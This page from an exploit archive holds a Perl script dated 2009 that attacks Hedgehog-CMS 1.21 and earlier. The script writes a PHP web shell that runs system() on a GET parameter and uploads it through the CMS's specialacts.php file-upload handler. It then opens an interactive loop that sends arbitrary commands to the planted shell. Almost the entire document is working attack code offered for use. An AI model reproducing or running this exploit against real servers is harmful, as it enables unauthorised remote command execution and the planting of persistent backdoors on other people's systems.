[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Hedgehog-CMS <= 1.21 Remote Command Execution Exploit
# Published : 2009-02-09
# Author : darkjoker
# Previous Title : PHP Director <= 0.21 Remote Command Execution Exploit
# Next Title : AdaptCMS Lite 1.4 (XSS/RFI) Multiple Remote Vulnerabilities
--+++===================================================================+++--
--+++====== Hedgedog-CMS <= 1.21 Remote Command Execution Exploit ======+++--
--+++===================================================================+++--
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
sub usage
{
print
"nHedgedog-CMS <= 1.21 Remote Command Execution Exploit".
"n[+] Author : darkjoker".
"n[+] Site : http://darkjoker.net23.net".
"n[+] Download : http://mesh.dl.sourceforge.net/sourceforge/hedgehog-cms/hedgehog-cms_v1.21.zip".
"n[+] Usage : perl ${0} <hostname> <path>".
"n[+] Ex. : perl ${0} localhost /hedgedogCMS".
"nn";
exit ();
}
sub upload_shell
{
my ($host, $path) = @_;
open SHELL, ">shell.php";
print SHELL "<?php system (stripslashes ($_GET ['cmd'])); ?>";
close SHELL;
my $url = "http://${host}${path}/specialacts.php";
my $lwp = LWP::UserAgent->new;
my $req = $lwp->request (
POST $url,
Content_Type => 'multipart/form-data',
Content => [l_mode => 1, l_file => ["shell.php"]],
);
unlink "shell.php";
return 1 if ($req->is_success);
return 0;
}
my ($host, $path) = @ARGV;
usage unless $path;
print "[-] Exploit failed.n" unless upload_shell ($host, $path);
my $cmd;
my $url = "http://${host}${path}/user/upload/shell.php";
while (1)
{
print "shell@${host}: $ ";
$cmd = <STDIN>;
chomp $cmd;
exit if $cmd =~ /quit/;
my $lwp = LWP::UserAgent->new;
my $req = $lwp->get (
$url . "?cmd=${cmd}",
);
print $req->decoded_content;
}
# www.Syue.com [2009-02-09]